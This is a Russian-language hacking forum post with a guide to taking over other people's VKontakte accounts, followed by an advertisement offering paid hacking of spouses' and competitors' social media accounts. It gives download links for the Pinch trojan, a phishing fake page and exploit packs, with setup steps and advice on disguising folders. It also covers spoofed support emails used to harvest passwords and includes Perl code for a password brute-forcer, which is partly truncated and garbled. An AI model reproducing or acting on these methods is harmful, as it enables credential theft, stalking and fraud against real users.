Что нам потребуется: Умение настраивать пинч(если это у вас уже получилось, то остальные 2 требования можно не смотреть) Прямые руки Хоть капелька мозга 1) Через мыло, если мы его знаем то уже все проще, ведь имеется как минимум 15 методов взлома почты...НО есть и еще один минус, если пароль "корявый", он разумеется надежный, но с его восстановлением проблемы, когда такой высылают на почту, то он принемает "левый" вид, и соответственно не работает. не в этом суть, поэтому останавливаться не будем 2) Фейк, достаточно простой способ, кидаем ссылку жертве любым способом(ася, через лс и тд) скачать его можно по ссылке vkontakte.rar [3.74 Kb] (cкачиваний: 16798) 3) Троян. Эту категорию мы разделим на другие. а) Скинуть "чистый" файл, либо ссылку на загрузку его, но тут еще надо чтобы пользователь его запустил. pinch.rar [724.46 Kb] (cкачиваний: 4021) - здесь лежит билдер пинча, а
здесь парсер parser3.rar [693.65 Kb] (cкачиваний: 1567) , если вы захотите чтобы отчеты шли на гейт - вот подходящий от Генома - gate.rar [4.09 Kb] (cкачиваний: 1095) б) кейлогер - менее полезный, но если жертва его "словит" и вы покопаетесь(причем оочень долго) с отчетом, то пароль получите 100% в) Сплоит, тут ничего сложного нету, НО ЕСТЬ МИНУС! Паблик сплоиты пробивают в основном ие6 и то, примерно, 6/10(имхо) Советую армитаж(айс пак тоже в теме). Прост в настройке, нужно только создать базу мускуль(делается в пару кликов), и отредактировать файлы(db.php
config.php), после того как зальете на хост, выставляем нужные права, на папку load - 777. config.php - 777 Скачать 3 связки можно по ссылке sv.rar [1.47 Mb] (cкачиваний: 801) - здесь лежат мпак, айспак и армитаж ЗЫ когда будете настраивать пинч, устанавите права на гейт 775, на папку в которую будут идти отчеты - 777, и не забывайте что не надо называть папку с
отчетами OtchetyOTpincha, имхо палевно, лучше назовите 404 или еще как, ну что бы внимания не привлекало...Папку в которой будет лежать сплоит, тоже
переиминуйте на что-нить типа myphotos и тд... тк люди будут эту ссылку себе в браузер пихать, не нужно что бы там было написанно EXPLOIT...лишнее палево ни
к чему... Идем дальше... Надеюсь, пинч уже настроен на гейт или почту, желательно что бы он еще и закриптованный был. Заходим по ссылке на файл install.php нашего сплоита, а потом идем в админку, устанавливаем настройки, выбераем файл который будет грузится жертве, теперь он
будет лежать в папке load под именем file. Кидаем ссылку жертве, и ждем с надеждой что ее пробьет и отчет с паролем нам придет. 4)Брутфорс, как всем известно - перебор паролей. Способ долгий, и не всегда сработает(в случае пароля D5&%-AefV) Для этого брутфорсера нам потребуется активперл скачать мона тут http://download.softportal.com/softw...ctiveperl.html либо по ссылке
http://www.denwer.ru/packages/perl.html Код брутфорсера: quote:
#!/usr/bin/perl
use IO::Socket; use MD5; use threads; use threads::shared; my @pass : shared;
$md5 = MD5->hexhash($pass); $sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80); print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n". "Host: vkontakte.ru\r\n". "Accept: */*\r\n". "Content-Type: application/x-www-fРѕrm-urlencoded\r\n". "User-Agent: Mozillo\r\n". "Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n". "Connection: close\r\n\r\n"; $answ = <$sock>; close $sock; print "$pass $answ"; if ($answ =~ /302/){ open (good, '>>good.txt'); print good "$id:$pass:$md5\n"; print "$id:$pass:$md5\n"; close good; exit;} }
}
goto Next;
sub pass { my (@mas); while (<pass>){ push @mas, $_; last if (@mas == 400); } chomp @mas; return @mas; }
Не забудьте сменить разширение на brut.pl $dic = ‘passl.txt’; #паслист для брдутфорсера $id = 1; #айдишник цели(его можно взять из адресной строки когда вы зашли на страницу жертвы) $mail = ‘мыло’; #мыло, значек @ меняем на %40 $threads = Х; # где Х - количество потоков
Если вам лень копаться со всем этим, то есть неплохой брут на С. Скачать его можно по ссылке vkontakte_bruteforce.rar [79.6 Kb] (cкачиваний: 6333), сразу говорю, если не запускается - это
ваши проблемы, ибо все прекрасно работает! 5)Имхо самый надежный способ, открываем исходник нашего фейка, закидываем в него наш код iframe... Теперь, когда жертва перейдет на нашу ссылку, мы увеличиваем вероятность того, что юзера пробьет, либо через браузер, либо через тупость, тк теперь у нас на
ссылке комбинированная атака на мозг(фейк) и браузер(код iframe). 6)Способ приводится много где, здесь нужно поискать сайты на которых сидит жертва(форумы, почта и пр) и попытаться похекать что-то из вышеперечисленного,
авось найдем старый заброшенный пароль, а он подойдет. 7) как обычно СИ, пробуем отправить письмо от адресата durov@vkontakte.ru или support@vkontakte.ru с текстом типа, ваша страница на сайте vkontakte.ru будет
заблокированна через N дней, если вы не подтвердите какую-нить хрень, методом отправки нам пароля. Или, можно прислать письмо типа, вам пришло личное сообщение/открытка и пр, от такого-то пользователя, что бы ее прочитать перейдите по ссылке, а ссылка
будет вести на наш фейк. Что-бы отправить письмо с "левого" адреса, нужен какой-нить майлер, Скачать SMTP mailer mailer.rar [227.48 Kb] (cкачиваний: 3426), либо любой подходящий для вас
из гугла. Только не забудьте зарегить себе не привлекающее мыло, похожее на суппортское, и вписать его в поле копия.(что бы пароли пришли именно вам на почту) 8) Снифер, тут лучше отправлять его на почту(если мы знаем мыло), тогда мы без лишних проблем сможем перехватить сессию, и с помощью системы восстановления
пароля на сайте вконтакте получить письмо с паролем. http://forum.antichat.ru/showthread.php?p=457280 Есть сниферы и получше, но они платные, все же тема распространена и в гуле можно ввсести запрос на пхп снифер и найти много полезной инфы. 9)ХSS, паблик дырок на этом сайте нету, так что кража кукисов маловероятна, хотя если ооочень долго подождать, то можно и дождаться паблик уязвимости - но
такой подход к делу бредовый, поэтому останавливаться на нем не будем. 10) Самый простой способ, единственное что от вас требуется - уметь работать с платежными системами и иметь деньги. Просто закажите взлом если вам не помог
ни один из 9 пунктов, может найдется умелец который сломает неприступную жертву. Поискать такогого можно здесь - http://forum.xakep.ru/forumid_308/tt.htm
На этом все, надеюсь вам не особо скучно было при чтении всего этого.
by [ TRaY ] (http://forum.xakep.ru/showProfile.aspx?memid=95140)
Кто ничего непонял, вам сюда - http://adin.su/blog/creative/15.html
Услуги хакера на заказ! Взлом почты / Взлом Вконтакте / Одноклассников
Хотите узнать с кем общается Ваша половинка в интернете? Желаете всегда быть в курсе дел Ваших конкурентов? Нужно узнать секреты или поймать на лжи? Взломать страницу мужа / Взломать страницу жены Устранение негативных отзывов / Убрать отзыв с сайта Устранение конкурентов
Тогда наш сервис для Вас!
Так же осуществляем взлом соц. сетей: odnoklassniki/ Одноклассники vkontakte / Вконтакте mamba / сайт знакомств facebook / фейсбук и т.д. Пишите прямо сейчас.email: ipvzlom@gmail.com
